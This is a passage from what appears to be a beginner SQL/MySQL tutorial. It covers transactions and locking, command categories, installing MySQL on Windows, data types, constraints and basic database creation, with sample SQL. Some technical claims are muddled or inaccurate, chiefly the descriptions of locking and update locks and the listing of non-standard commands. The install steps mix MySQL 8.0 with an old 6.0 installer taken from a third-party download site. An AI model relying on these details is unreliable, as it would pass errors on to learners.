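The pitfall described above is easy to demonstrate. In the sketch below (Python's built-in sqlite3 module, with an invented customers table), the same SELECT * query returns a different row shape after a column is added, while the explicit column list keeps returning exactly what the program expects.

```python
import sqlite3

# Invented table for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (id INTEGER, name TEXT)")
conn.execute("INSERT INTO customers VALUES (1, 'Alex')")

# SELECT * returns whatever columns exist *right now* ...
print(conn.execute("SELECT * FROM customers").fetchone())  # (1, 'Alex')

# ... so after the table changes, the same query silently returns a
# different shape, which can break code that assumed two columns.
conn.execute("ALTER TABLE customers ADD COLUMN email TEXT")
star_row = conn.execute("SELECT * FROM customers").fetchone()
print(star_row)  # (1, 'Alex', None)

# Naming the columns explicitly keeps the result stable.
explicit_row = conn.execute("SELECT id, name FROM customers").fetchone()
print(explicit_row)  # (1, 'Alex')
```

This is why the advice is to spell out column names in application code and save the asterisk for interactive, ad hoc queries.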

Since the replacement of paper files stored in a physical file cabinet, relational databases have broken new ground. Relational database management systems, or RDBMSs for short, are used anywhere information is stored or retrieved, like a login account for a website or articles on a blog. Speaking of which, this also gave a new platform to, and helped leverage, websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia, for instance, contains articles, links, and images, all of which are stored in a database behind the scenes. Facebook holds much of the same type of information, and Amazon holds product information and payment methods, and even handles payment transactions. With that in mind, banks also use databases for payment transactions and to manage the funds within someone's bank account. Other industries, like retail, use databases to store product information, inventory, sales transactions, prices, and so much more. Medical offices use databases to store patient information, prescription medications, appointments, and other information. To expand further, using the medical office as an example, a database allows numerous users to connect to it at once and interact with its information. Since it uses a network to manage connections, virtually anyone with access to the database can reach it from just about anywhere in the world. These types of databases have also given way to new jobs and have even expanded the tasks and responsibilities of current jobs. Those who work in finance, for instance, now have the ability to run reports on financial data; those in sales can run reports for sales forecasts, and so much more! In practical situations, databases are often used by multiple users at the same time. A database that can support many users at once has a high level of concurrency. In some situations, concurrency can lead to loss of data or the reading of non-existent data.
SQL manages these situations by using transactions to control atomicity, consistency, isolation, and durability. These elements comprise the properties of transactions. A transaction is a sequence of T-SQL statements that combine logically and complete an operation that would otherwise introduce inconsistency to a database. Atomicity is a property that acts as a container for transaction statements. If every statement is successful, the total transaction completes. If any part of a transaction fails to process fully, the entire operation fails, and all partial changes roll back to a prior state.

Transactions take place once a row or page-wide lock is in place. Locking prevents other users' modifications from taking effect on the locked object. It is akin to reserving a spot within the database to make changes. If another user attempts to change data under lock, their process will fail, and an alert communicates that the object in question is barred and unavailable for modification. Transforming data using transactions allows a database to move from one consistent state to a new consistent state. It's critical to understand that transactions can modify more than one table at a time. Changing data in a primary key field without simultaneously updating the foreign key fields that reference it creates inconsistent data that SQL does not accept. Transactions are a big part of changing related data from multiple table sources all at once.

Transactional transformation reinforces isolation, a property that prevents concurrent transactions from interfering with each other. If two transactions attempt to modify the same data at the same time, only one of them will succeed. Transactions are invisible until they are complete, and whichever transaction completes first is accepted. The new information displays once the failed transaction ends, and at that point the user must decide whether the updated information still requires modification. If there happened to be a power outage and the stability of the system failed, durability would ensure that the effects of incomplete transactions roll back. If one transaction completes and another concurrent transaction fails to finish, the completed transaction is retained. Rollbacks are accomplished by the database engine using the transaction log to identify the previous state of the data and restore it to an earlier point in time.

There are a few variations of a database lock, and various properties of locks as well. Lock properties include mode, granularity, and duration.
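As a sketch of atomicity in practice, the following T-SQL moves money between two rows of a hypothetical accounts table; either both updates become permanent, or an error triggers a rollback that returns both rows to their prior state (the table and column names are invented for illustration):

```sql
BEGIN TRANSACTION;

-- Move 100 from one account to another; both statements
-- belong to the same atomic unit of work.
UPDATE accounts SET balance = balance - 100 WHERE account_id = 1;
UPDATE accounts SET balance = balance + 100 WHERE account_id = 2;

-- If both statements succeeded, make the changes permanent.
-- On any error we would issue ROLLBACK TRANSACTION instead,
-- undoing every partial change.
COMMIT TRANSACTION;
```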
The easiest to define is duration, which specifies the time interval during which the lock is applied. Lock modes define different types of locking, and these modes are determined based on the type of resource being locked. A shared lock allows data reads while the row or page lock is in effect. Exclusive locks are for performing data manipulation (DML), and they provide exclusive use of a row or page for the execution of data modification. Exclusive locks do not take place concurrently; while data is being actively modified, the page is inaccessible to all other users regardless of permissions. Update locks are placed on a single object and allow data reads while the update lock is in place. They also allow the database engine to determine whether an exclusive lock is necessary once a transaction that modifies an object is committed. This is only true if no other locks are active on the object in question at the time of the update lock. The update lock is the best of both worlds, allowing reads and DML transactions to take place at the same time until the actual update is committed to the row or table. These lock types describe page-level locking, but there are other types beyond the scope of this text.

The final property of a lock, granularity, specifies to what degree a resource is unavailable. Rows are the smallest object available for locking, leaving the rest of the database available for manipulation. Pages, indexes, tables, extents, or the entire database are candidates for locking. An extent is a physical allocation of data, and the database engine will employ this lock if a table or index grows and more disk space is needed. Problems can arise from locks, such as lock escalation or deadlock, and we highly encourage readers to pursue a deeper understanding of how these function.

It is useful to mention that Oracle developed an extension for SQL that allows for procedural instruction using SQL syntax. This is called PL/SQL. SQL on its own is unable to provide procedural instruction because it is a non-procedural language; the extension changes this and expands the capabilities of SQL. PL/SQL code is used to create and modify advanced SQL constructs such as functions, stored procedures, and triggers. Triggers allow SQL to perform specific operations when conditional instructions are defined. They are an advanced functionality of SQL, and often work in conjunction with logging or alerts to notify principals or administrators when errors occur. SQL lacks the control structures for looping, branching, and decision-making that are available in programming languages such as Java.
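As a small, hedged illustration of the trigger concept (MySQL syntax here; the employees and salary_audit tables are invented), the following logs a row every time a salary changes:

```sql
-- An invented audit table to record salary changes.
CREATE TABLE salary_audit (
    emp_id     INT,
    old_salary DECIMAL(10,2),
    new_salary DECIMAL(10,2),
    changed_at DATETIME
);

-- Fire after every UPDATE on employees and write one audit row.
CREATE TRIGGER trg_salary_change
AFTER UPDATE ON employees
FOR EACH ROW
INSERT INTO salary_audit (emp_id, old_salary, new_salary, changed_at)
VALUES (OLD.emp_id, OLD.salary, NEW.salary, NOW());
```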
The Oracle Corporation developed PL/SQL to meet the needs of its database product, which includes similar functionality to other database management systems but is not limited to non-procedural operations. Previously, user-defined functions were mentioned but not defined. T-SQL alone does not adequately cover the creation of user-defined functions, but with programming it is possible to create functions that fit neatly within the same scope as system-defined functions. A user-defined function (UDF) is a programming construct that accepts parameters, performs tasks capable of making use of system-defined parameters, and returns results. UDFs are tricky because Microsoft SQL Server also allows for stored procedures that can often accomplish the same task as a user-defined function. Stored procedures are batches of SQL statements that can be executed in multiple ways and contain centralized data access logic. Both of these features are important when working with SQL in production environments.
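To make the UDF idea concrete, here is a minimal T-SQL sketch of a scalar user-defined function and a call to it (the function name and logic are invented for illustration):

```sql
-- A scalar user-defined function: accepts a parameter
-- and returns a computed result.
CREATE FUNCTION dbo.YearlySalary (@monthly DECIMAL(10,2))
RETURNS DECIMAL(12,2)
AS
BEGIN
    RETURN @monthly * 12;
END;
GO

-- The function can then be used wherever an expression is allowed:
SELECT dbo.YearlySalary(4000.00) AS yearly;  -- 48000.00
```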

Chapter 3 Some of the Basic Commands We Need to Know

Now, before we get too far into the coding that we are able to do with this language, one of the first things we need to learn is some of the basic commands that come with it, and how each of them works. You will find that when you know the commands that come with any language, but especially with SQL, it will ensure that everything within the database works the way that you would like. As we go through this, you will find that the commands in SQL, just like the commands in any other language, vary. Some are easier to work with and some are more of a challenge. But all of them will come into use when you would like to create some of your own queries in this language, so it is worth our time to learn how this works. The basic commands that are available in SQL can be divided into six categories, based on what you will be able to use them for within the system. The six categories of commands that you can use inside of SQL are the following.

Data Definition Language

The data definition language, or DDL, is the aspect of SQL that allows you to generate objects in the database before arranging them the way that you would like. For example, you will be able to use this part of the language to add or delete objects such as database tables. Some of the commands that fall into the DDL category include:

CREATE TABLE
ALTER TABLE
DROP TABLE
CREATE INDEX
ALTER INDEX
DROP INDEX
DROP VIEW

Data Manipulation Language

The DML, or data manipulation language, is the aspect of SQL that you will use to modify the information about the objects inside your database. It makes it much easier to delete objects, update them, or insert something new into the database you are working with. You will find that this is one of the best ways to add some freedom to the work that you are doing, since it ensures that you can change the information that is already there rather than only adding something new.

Data Query Language

Along the same lines is the DQL, or data query language. This one is fun to work with because it is one of the most powerful aspects of the SQL language, and that is even truer when you work with a modern database. Here there is really only one command to choose from, and that is the SELECT command. You use this command to make sure that your queries are run in the right way within your relational database. But if you want to ensure that you are getting results that are more detailed, it is possible to add options or a special clause along with the SELECT command to make this easier.

Data Control Language

The DCL, or data control language, provides the commands you will use when you want to maintain control over the database and limit who is allowed to access it, or parts of it, at a given time. You will also find that DCL is used in some situations to generate the database objects related to who has the necessary access to see the information found in that database, including who has the right to distribute access privileges to this data. This is a good thing to use if your business is dealing with a lot of sensitive information and you only want a few people to get hold of it. Some of the commands that you may find useful when working with DCL include:

GRANT
REVOKE
CREATE SYNONYM
ALTER PASSWORD

Data Administration Commands

When you choose to work with these commands, you will be able to analyze and audit the operation of the database, and in some instances assess its overall performance. This makes them good commands to choose when you want to find and fix some of the bugs in the system so that the database will continue to work properly. Some of the most common commands of this type include:

START AUDIT
STOP AUDIT
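To make these categories concrete, here is a short, hedged sketch with one representative statement from each of the first four categories (the books table and user name are invented):

```sql
-- DDL: define a database object
CREATE TABLE books (id INT, title VARCHAR(100));

-- DML: change the data inside the object
INSERT INTO books (id, title) VALUES (1, 'SQL Basics');

-- DQL: query the data
SELECT title FROM books WHERE id = 1;

-- DCL: control who may read the table
GRANT SELECT ON books TO some_user;
```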

One thing to keep in mind is that database administration and data administration are basically different things in SQL. Database administration is in charge of managing the databases as a whole, including the commands that you set out in SQL, and it is also more specific to a particular implementation of SQL.

Transactional Control Commands

The final type of command that we are going to take a look at is the transactional control commands. These are good commands to work with in SQL when you would like the ability to keep track of, and manage, the different transactions that show up in the database you are working with. If you sell products online through your website, for example, you will need to work with the transactional control commands to keep track of the options the user is looking for, to keep track of the profits, and to manage the website so that you know what is going on with it at all times. There are a few options to work with when it comes to these transactional control commands, and the most important ones to spend our time on include:

COMMIT: saves all of the information about the transactions inside the database.
SAVEPOINT: generates different points inside the groups of transactions. You should use this along with the ROLLBACK command.
ROLLBACK: the command you will use if you want to go through the database and undo one or more of the transactions.
SET TRANSACTION: assigns names to the transactions in your database. You can use it to add some organization to your database system.

All of the commands that we have spent some time discussing in this chapter are going to be important to some of the work that we want to get done and will ensure that we find the specific results that we need from our database. We will spend more time on them throughout this book, but this is a good introduction to what they mean and how we will be able to use them for our needs later on.
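The transactional control commands described in this chapter can be sketched together in a single session (the orders table is invented; SET TRANSACTION NAME is Oracle-style syntax, and other systems vary):

```sql
SET TRANSACTION NAME 'new_order';   -- give the transaction a name (Oracle-style)

INSERT INTO orders (id, item) VALUES (1, 'keyboard');
SAVEPOINT after_first_item;         -- a point we can roll back to

INSERT INTO orders (id, item) VALUES (2, 'mouse');
ROLLBACK TO after_first_item;       -- undo only the second insert

COMMIT;                             -- make the first insert permanent
```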

Chapter 4 Installing and Configuring MySQL on Your System

If you already have MySQL Server installed then you can skip this section. Here, I am going to provide the steps required to install MySQL 8.0 on a Windows computer. Here is the link to the software: https://dev.mysql.com/downloads/mysql/8.0.html. If you are not using Windows, then under the heading “MySQL Community Server 8.0.18” you will see the “Select Operating System:” drop-down box. Select your operating system and you will be provided with all the options. If you are learning on a standalone system and you are a beginner, I would recommend that you install Windows Essentials from https://mysqlessential.en.uptodown.com/windows.

While looking for information on MySQL, you will come across terms like MySQL Community Server, MySQL Installer, and MySQL Essentials. As the name suggests, Essentials provides just what is essential, without any additional components, and is ideal for starting to learn. Both the installer and the community server have full server features, but the community server is only installed online; for the installer, you download the package and then install it offline.

Back to MySQL Essentials. Once you click the download button, the installer package can be found in the downloads folder under the name “mysql-essential-6.0.0.msi”. Follow the steps given below for installing the software.

1. Double-click on the mysql-essential-6.0.0.msi package to start the installation process. You will see a MySQL Server 6.0 – Setup Wizard window. To continue with the installation process, click on the “Next” button.
2. You will now have to select the setup type. Setup can be one of three types: Typical, for general use; Complete, for installation of all program features; or Custom, to select which components you want to install. You can go ahead with the Typical installation. If you want to change the path where the software is installed, then you will have to opt for the Custom installation.
3. For this book, I went with the Custom installation because I wanted to change the path of installation. Click Next.

4. The next screen will prompt you to log in or create a MySQL account. Signing up is not mandatory; you can create an account or click on the “Skip Sign-Up” radio button and click the Next button.
5. You have reached the last screen of the installation process. Before pressing the Finish button, ensure that the “Configure the MySQL Server now” check box is checked.

We now move on to the configuration of MySQL. After clicking the “Finish” button, you will be presented with the “MySQL Server Instance Configuration Wizard”. If the window does not pop up on its own, click the Start button on the desktop, look for the wizard, and click on it. Click “Next” on the first screen. Now follow the steps given below:

1. You must first select whether you want to go for the detailed or the standard configuration. Select “Detailed Configuration”.
2. Next, you have to select the server type. Your selection will influence memory, disk, and CPU usage. Go for Server if you are planning to work on a server that is hosting other applications. Click Next.
3. If you selected Server in the above step, you will be presented with a screen where you are asked to set a path for the InnoDB data file to enable the InnoDB database engine. Without making any modifications, click on Next.
4. On this screen, you will have to set the approximate number of concurrent connections directed to the server. For general-purpose usage, it is best to go with the first option. Click Next after making your selection.
5. On the next screen, you are presented with two options: (1) set TCP/IP networking to enabled, and (2) enable strict mode. Check the “Enable TCP/IP Networking” option. The second option, “Enable Strict Mode”, will be checked by default. Most applications do not prefer this option, so if you do not have a good reason for using strict mode, uncheck this option and click the Next button.
6. You will now be asked to set the default character set used by MySQL. Select “Standard Character Set” and click on Next.
7. In this step, you must set the Windows options. You will see three check boxes: “Install as Windows Service”, “Launch the MySQL Server automatically”, and “Include Bin Directory in Windows PATH”. Check all three boxes and click Next.
8. You will now have to set the root password for the account. Check “Modify Security Settings” and provide your password details. If your server is on the internet, then avoid checking “Enable root access from remote machines”. It is also not recommended to check the “Create An Anonymous Account” option. Please save the password in a safe place.
9. This window will show you how the configuration is progressing. Once the processing is over, the “Finish” button will be enabled and you can click on it.

Congratulations!! You have successfully installed and configured MySQL on your machine. It is time for action now.
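Once the server is running, a quick way to confirm the installation is to open the mysql command-line client that ships with the server and run a trivial query:

```sql
-- Ask the server to report its own version string.
SELECT VERSION();
```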

Chapter 5 Data Types

There are various types of data that can be stored in databases. Listed below are some of the data types that can be found and used in a database:

• Byte- Allows numbers in the range of 0-255 to be stored. Storage is 1 byte.
• Currency- Holds 15 whole dollar digits with up to 4 additional decimal places. Storage is 8 bytes.
• Date/Time- Used for dates and times. Storage is 8 bytes.
• Double- A double-precision floating point which will handle most decimals. Storage is 8 bytes.
• Integer- Allows whole numbers between -32,768 and 32,767. Storage is 2 bytes.
• Text- Used for combinations of text and numbers. Up to 255 characters can be stored.
• Memo- Can be used for larger amounts of text. It can store 65,536 characters. Memo fields can't be sorted, but they can be searched.
• Long- Allows whole numbers between -2,147,483,648 and 2,147,483,647. Storage is 4 bytes.
• Single- A single-precision floating point that will handle most decimals. Storage is 4 bytes.
• AutoNumber- Automatically gives each record of data its own number, usually starting at 1. Storage is 4 bytes.
• Yes/No- A logical field that can be displayed as yes/no, true/false, or on/off. True and false are equivalent to -1 and 0. In these fields, null values are not allowed. Storage is 1 bit.
• OLE Object- Can store BLOBs, which are Binary Large Objects, such as pictures, audio, and video. Storage is up to 1 gigabyte (GB).
• Hyperlink- Contains links to other files, like web pages.
• Lookup Wizard- Lets you make an options list, which can then be chosen from a drop-down list. Storage is 4 bytes.

Overall, data types can be categorized into three different types of data. They are either

1. Character types
2. Number types
3. Date/Time types

Character types consist of text. Number types contain amounts or numbers. Date/Time types consist of a recorded date or time. Listed below are some of the data types in each category.

Character Data Types

• CHAR(size)- Holds a fixed-length string. It is able to hold special characters, letters, and numbers, and can store up to 255 characters.
• VARCHAR(size)- Holds a variable-length string of special characters, letters, and numbers. The size is specified in parentheses and can be up to 255 characters. If you specify a size higher than 255 characters, the column is automatically converted to a TEXT type.
• TINYTEXT- Holds a string with a maximum length of 255 characters.
• TEXT- Holds a string with a maximum length of 65,535 characters.
• MEDIUMTEXT- Holds a string with a maximum length of 16,777,215 characters.
• LONGTEXT- Holds a string with a maximum length of 4,294,967,295 characters.
• BLOB- Holds a maximum of 65,535 bytes of data.
• MEDIUMBLOB- Holds a maximum of 16,777,215 bytes of data.
• LONGBLOB- Holds a maximum of 4,294,967,295 bytes of data.
• ENUM(x,y,z, etc.)- A list of possible values. The list can hold a maximum of 65,535 values. When a value is entered that isn't contained in the list, a blank value is stored instead. The values are sorted in the order in which they were entered.
• SET- Similar to the ENUM data type, except that SET holds a maximum of 64 list items and is able to store more than one choice.

Number Data Types

The most common options are listed below, along with their storage in bytes and the values they can hold:

• TINYINT(size)- Holds -128 to 127, or 0 to 255 unsigned.
• SMALLINT(size)- Holds -32,768 to 32,767, or 0 to 65,535 unsigned.
• MEDIUMINT(size)- Holds -8,388,608 to 8,388,607, or 0 to 16,777,215 unsigned.
• INT(size)- Holds -2,147,483,648 to 2,147,483,647, or 0 to 4,294,967,295 unsigned.
• BIGINT(size)- Holds -9,223,372,036,854,775,808 to 9,223,372,036,854,775,807, or 0 to 18,446,744,073,709,551,615 unsigned.
• FLOAT(size,d)- A small number with a floating decimal point. The maximum number of digits is specified in the size parameter, and the maximum number of digits to the right of the decimal point is specified in the d parameter.
• DOUBLE(size,d)- A large number with a floating decimal point. The maximum number of digits is specified in the size parameter, and the maximum number of digits to the right of the decimal point is specified in the d parameter.
• DECIMAL(size,d)- A number stored as a string, which allows a fixed decimal point. The maximum number of digits is specified in the size parameter, and the maximum number of digits to the right of the decimal point is specified in the d parameter.

An extra option found on the integer types is called unsigned. Normally, an integer's range runs from a negative value to a positive value. Adding the unsigned attribute moves the range up so that it starts at zero rather than a negative number. That is why an unsigned range is mentioned after the signed range for each of the integer data types above.

Date/Time Data Types

The options for dates and times are:

• DATE()- Enters a date in the format YYYY-MM-DD, as in 2016-04-19 (April 19th, 2016).
• DATETIME()- Enters a combination of date and time in the format YYYY-MM-DD HH:MM:SS, with a time such as 13:30:26 (1:30 p.m. at 26 seconds).
• TIMESTAMP()- Stores the number of seconds elapsed, matched to the current time zone. The format is YYYY-MM-DD HH:MM:SS.
• TIME()- Allows you to enter a time. The format is HH:MM:SS.
• YEAR()- Enters a year in a two- or four-digit format. A four-digit format would be 2016 or 1992; a two-digit format would be 72 or 13.

It is important to note that although DATETIME and TIMESTAMP return the same format, they work in different ways when compared to each other. TIMESTAMP automatically updates to the current time and date of the present time zone. TIMESTAMP will also accept various other formats, such as YYYYMMDDHHMMSS, YYMMDDHHMMSS, YYYYMMDD, and YYMMDD.
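To tie several of these types together, here is a hedged sketch of a table definition in MySQL syntax (the table and column names are invented for illustration):

```sql
CREATE TABLE products (
    id          INT UNSIGNED,              -- whole numbers from 0 upward
    name        VARCHAR(100),              -- variable-length text, up to 100 chars
    description TEXT,                      -- longer free-form text
    price       DECIMAL(8,2),              -- fixed point: up to 8 digits, 2 after the point
    category    ENUM('book','toy','food'), -- one value from a fixed list
    added_on    DATETIME                   -- e.g. '2016-04-19 13:30:26'
);
```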

Chapter 6 SQL Constraints

Constraints refer to the rules or restrictions that are applied to a table or its columns. These rules are applied to ensure that only specific data types and values can be used in a table, which helps ensure the accuracy and reliability of the data. You can specify constraints at the table or column level. When constraints are specified at the column level, they apply only to a specific column; when they are defined at the table level, they apply to the entire table. SQL offers several types of constraints. The following are the most commonly used ones:

PRIMARY Key
FOREIGN Key
UNIQUE Key
INDEX
NOT NULL
CHECK Constraint
DEFAULT Constraint

PRIMARY Key

A primary key is a unique value which is used to identify a row or record. There is only one primary key for each table, but it may consist of multiple fields. A column that has been designated as a primary key can't contain NULL values. In general, a primary key is designated during the table creation stage.

Creating a Primary Key

The following statement creates a table named EMPLOYEES and designates the ID field as its primary key:
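A statement along those lines might look like the following sketch (the columns other than ID are invented for illustration):

```sql
CREATE TABLE EMPLOYEES (
    ID   INT NOT NULL,
    NAME VARCHAR(50),
    AGE  INT,
    PRIMARY KEY (ID)    -- the unique identifier for each row
);
```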

You may also specify a primary key constraint later using the ALTER TABLE statement. Here's the code for adding a primary key constraint to the EMPLOYEES table:
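A hedged sketch of that ALTER TABLE statement might be (the constraint name PK_EMPLOYEES is invented):

```sql
ALTER TABLE EMPLOYEES
ADD CONSTRAINT PK_EMPLOYEES PRIMARY KEY (ID);
```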

Deleting a Primary Key Constraint

To remove the primary key constraint from a table, you will use the ALTER TABLE statement with the DROP clause, for example: ALTER TABLE EMPLOYEES DROP PRIMARY KEY; (this is MySQL syntax; some other systems drop the constraint by name instead).

FOREIGN Key

A foreign key constraint is used to associate a table with another table. Also known as a referencing key, the foreign key is commonly used when you're working with parent and child tables. In this type of table relationship, a key in the child table points to the primary key in the parent table. A foreign key may consist of one or several columns containing values that match the primary key in another table. It is commonly used to ensure referential integrity within the database. The diagram below demonstrates the parent-child table relationship:

The EMPLOYEES_TBL is the parent table. It contains important information about employees and uses the field emp_id as its primary key to identify each employee. The EMPLOYEES_SALARY_TBL contains information about employees' salary, position, and other details. It is logical to assume that all salary data is associated with a specific employee entered in the EMPLOYEES_TBL. You can enforce this logic by adding a foreign key on the EMPLOYEES_SALARY_TBL and setting it to point to the primary key of the EMPLOYEES_TBL. This ensures that the data for each employee in the EMPLOYEES_SALARY_TBL is referenced to the specific employee listed in the EMPLOYEES_TBL. Consequently, it also prevents the EMPLOYEES_SALARY_TBL from storing data for names that are not included in the EMPLOYEES_TBL. To demonstrate how to set up the foreign key constraint, create a table named EMPLOYEE with the following statement:
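A sketch of that parent-table statement (the columns other than ID are assumptions):

```sql
CREATE TABLE EMPLOYEE (
    ID   INT NOT NULL,
    NAME VARCHAR(50),
    AGE  INT,
    PRIMARY KEY (ID)    -- the key the child table will point to
);
```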

The EMPLOYEE table will serve as the parent table. Next, create a child table that will refer to the EMPLOYEE table:
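The child table could be sketched as follows, with its ID column declared as a foreign key (the position and salary columns are invented):

```sql
CREATE TABLE EMPLOYEE_SALARY (
    ID       INT NOT NULL,
    POSITION VARCHAR(50),
    SALARY   DECIMAL(10,2),
    FOREIGN KEY (ID) REFERENCES EMPLOYEE (ID)  -- points to the parent's primary key
);
```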

Notice that the ID column in the EMPLOYEE_SALARY table references the ID column in the EMPLOYEE table. At this point, you may want to see the structure of the EMPLOYEE_SALARY table. You can use the DESC command to do this: DESC EMPLOYEE_SALARY;

The FOREIGN KEY constraint is typically specified during table creation, but you can still add a foreign key to an existing table by modifying it. For this purpose, you will use the ALTER TABLE command. For example, to add a foreign key constraint to the EMPLOYEE_SALARY table, you will use this statement:
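That ALTER TABLE statement might be sketched as follows (the constraint name FK_EMP is invented):

```sql
ALTER TABLE EMPLOYEE_SALARY
ADD CONSTRAINT FK_EMP FOREIGN KEY (ID) REFERENCES EMPLOYEE (ID);
```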

Removing a FOREIGN KEY Constraint

To drop a FOREIGN KEY constraint, you will use this simple syntax:
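In MySQL, the constraint is dropped by its name (FK_EMP here is an assumed constraint name):

```sql
ALTER TABLE EMPLOYEE_SALARY DROP FOREIGN KEY FK_EMP;
```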

NOT NULL

A column can contain NULL values by default. To prevent NULL values from populating a table's column, you can implement a NOT NULL constraint on the column. Bear in mind that the word NULL pertains to unknown data, not zero data. To illustrate, the following code creates the table STUDENTS and defines six columns:
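A reconstruction of such a statement could look like this; the ID, LAST_NAME, FIRST_NAME, AGE, and LOCATION columns follow the surrounding text, while the sixth column is an invented example:

```sql
CREATE TABLE STUDENTS (
    ID         INT         NOT NULL,
    LAST_NAME  VARCHAR(30) NOT NULL,
    FIRST_NAME VARCHAR(30) NOT NULL,
    AGE        INT         NOT NULL,
    LOCATION   VARCHAR(50),           -- may hold NULL for now
    EMAIL      VARCHAR(50)            -- invented sixth column
);
```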

Notice the NOT NULL modifier on the columns ID, LAST_NAME, FIRST_NAME, and AGE. This means that these columns will not accept NULL values. If you want to modify a column that accepts NULL values into one that does not, you can do so with the ALTER TABLE statement. For instance, if you want to enforce a NOT NULL constraint on the column LOCATION, here's the code:
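Using MySQL's MODIFY syntax, that change might look like (the VARCHAR size is an assumption):

```sql
ALTER TABLE STUDENTS
MODIFY LOCATION VARCHAR(50) NOT NULL;
```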

UNIQUE Key

A UNIQUE key constraint is used to ensure that all values in a column are unique. Enforcing this constraint prevents two or more rows from holding the same value in a particular column. For example, you can apply this constraint if you don't want two or more students to have the same LAST_NAME in the STUDENTS table. Here's the code:
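One way such a statement could be written (columns other than LAST_NAME are assumptions):

```sql
CREATE TABLE STUDENTS (
    ID         INT         NOT NULL,
    LAST_NAME  VARCHAR(30) NOT NULL UNIQUE,  -- no two rows may share a last name
    FIRST_NAME VARCHAR(30) NOT NULL,
    AGE        INT
);
```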

You can also use the ALTER TABLE statement to add a UNIQUE constraint to an existing table. Here’s the code:
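For example, in MySQL syntax, making an existing AGE column both NOT NULL and UNIQUE after the fact might look like:

```sql
ALTER TABLE STUDENTS
MODIFY AGE INT NOT NULL UNIQUE;
```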

You may also add a constraint to more than one column by using ALTER TABLE with ADD CONSTRAINT:
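A multi-column version might be sketched as follows (the column pair is an assumption; the constraint name myUniqueConstraint comes from the surrounding text):

```sql
ALTER TABLE STUDENTS
ADD CONSTRAINT myUniqueConstraint UNIQUE (LAST_NAME, FIRST_NAME);
```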

Removing a UNIQUE Constraint

To remove the myUniqueConstraint, you will use the ALTER TABLE statement with the DROP clause. Here's the syntax:
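In MySQL, a UNIQUE constraint is dropped as an index:

```sql
ALTER TABLE STUDENTS DROP INDEX myUniqueConstraint;
```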

DEFAULT Constraint

The DEFAULT constraint is used to provide a default value whenever the user fails to enter a value for a column during an INSERT INTO operation. To demonstrate, the following code will create a table named EMPLOYEES with five columns. Notice that the SALARY column takes a default value (4000.00), which will be used if no value is provided when you add new records:
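A sketch of that five-column table (the columns other than SALARY are assumptions):

```sql
CREATE TABLE EMPLOYEES (
    ID         INT NOT NULL,
    LAST_NAME  VARCHAR(30),
    FIRST_NAME VARCHAR(30),
    AGE        INT,
    SALARY     DECIMAL(10,2) DEFAULT 4000.00  -- used when no salary is supplied
);
```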

You may also use the ALTER TABLE statement to add a DEFAULT constraint to an existing table:
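In MySQL syntax, that might look like this (the new default value is only an example):

```sql
ALTER TABLE EMPLOYEES
ALTER COLUMN SALARY SET DEFAULT 5000.00;
```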

Removing a DEFAULT Constraint

To remove a DEFAULT constraint, you will use the ALTER TABLE statement with DROP:
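For example, in MySQL syntax:

```sql
ALTER TABLE EMPLOYEES
ALTER COLUMN SALARY DROP DEFAULT;
```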

CHECK Constraint

A CHECK constraint is used to ensure that each value entered in a column satisfies a given condition. An attempt to enter non-matching data results in a violation of the CHECK constraint, which causes the data to be rejected. For example, the code below will create a table named GAMERS with five columns. It places a CHECK constraint on the AGE column to ensure that there will be no gamers under 13 years old in the table.
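One possible reconstruction of that five-column table (columns other than AGE are assumptions):

```sql
CREATE TABLE GAMERS (
    ID         INT NOT NULL,
    LAST_NAME  VARCHAR(30),
    FIRST_NAME VARCHAR(30),
    USERNAME   VARCHAR(30),
    AGE        INT CHECK (AGE >= 13)  -- rejects any gamer younger than 13
);
```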

You can also use the ALTER TABLE statement with MODIFY to add the CHECK constraint to an existing table:
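Using the MODIFY syntax the text describes, that might be sketched as (note that MySQL only enforces CHECK constraints from version 8.0.16 onward):

```sql
ALTER TABLE GAMERS
MODIFY AGE INT CHECK (AGE >= 13);
```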

INDEX Constraint

The INDEX constraint lets you build and access information quickly from a database. You can create an index with one or more table columns. After the INDEX is created, SQL assigns a ROWID to each row prior to sorting. Proper indexing can enhance the performance and efficiency of large databases. Here's the syntax:
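The general CREATE INDEX syntax looks like this (all names are placeholders):

```sql
CREATE INDEX index_name
ON table_name (column1, column2);
```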

For instance, if you need to search for a group of employees from a specific location in the EMPLOYEES table, you can create an INDEX on the column LOCATION. Here’s the code:
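For that example, the statement could be sketched as (the index name idx_location is invented):

```sql
CREATE INDEX idx_location
ON EMPLOYEES (LOCATION);
```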

Removing the INDEX Constraint

To remove the INDEX constraint, you will use the ALTER TABLE statement with DROP.
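For example, in MySQL syntax (idx_location being an assumed index name):

```sql
ALTER TABLE EMPLOYEES DROP INDEX idx_location;
```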

Chapter 7 Databases

In this chapter, I will talk about different database-related operations. You need to learn these operations as part of learning SQL. The operations that I am talking about here are how to create a database, how to select a database, and finally, if need be, how to drop a database from your SQL Server. I will teach you how to do these operations with queries and with the help of the graphical user interface of SQL Server. So, let's start with creating a database.

Start SQL Server and connect to the SQL instance that you created while setting up SQL Server. Click on the New Query option available on the “Standard” toolbar under the main menu. After you click on the New Query button, a window will open up, and you will see a text editor on your screen. In the text editor, write the following query:

Create database Employee;

Click on the Execute button, which has an exclamation mark in red. After execution, you will see a message stating that your command ran successfully. Now, to see the newly created database, go to the left side of your screen, where a navigation panel is present. Look for a folder that says ‘Databases’ and expand it. You will now see the list of databases present in the current instance of SQL.

Now, let's look at a way to create a database by using the navigation panel. Right-click on the Databases folder, and then select the ‘New Database’ option. Once you do that, a new window will open up. Use this window to pass on the name of your database, and click the “OK” button. If all goes well, you will now have a new database; you can go to the navigation panel and look through the list of databases for it. To select your newly created database, you can use the following SQL statement before writing the rest of your SQL query:

Use Employee;

The aforementioned statement ensures that your query will be executed on the database you explicitly mentioned.
You can also select your desired database using SQL Server's GUI. Near the New Query option, there is a drop-down list containing the names of all the databases present in the current

instance of SQL Server. Go ahead and select your database from that drop-down list.

Now that we have covered creating and selecting a database in SQL Server, let's see how you can safely delete, or drop, a database. When you perform a drop operation on a database, the database is deleted permanently from the SQL Server instance. I will drop the Employee database that I created for this tutorial. This database doesn't contain any data so far, but that makes no difference to the DROP statement. Here's the query to drop the database:

Example:
Drop Database Employee;

If all goes well, you will see the following message as output in the messages window.

Output:
Command(s) completed successfully.

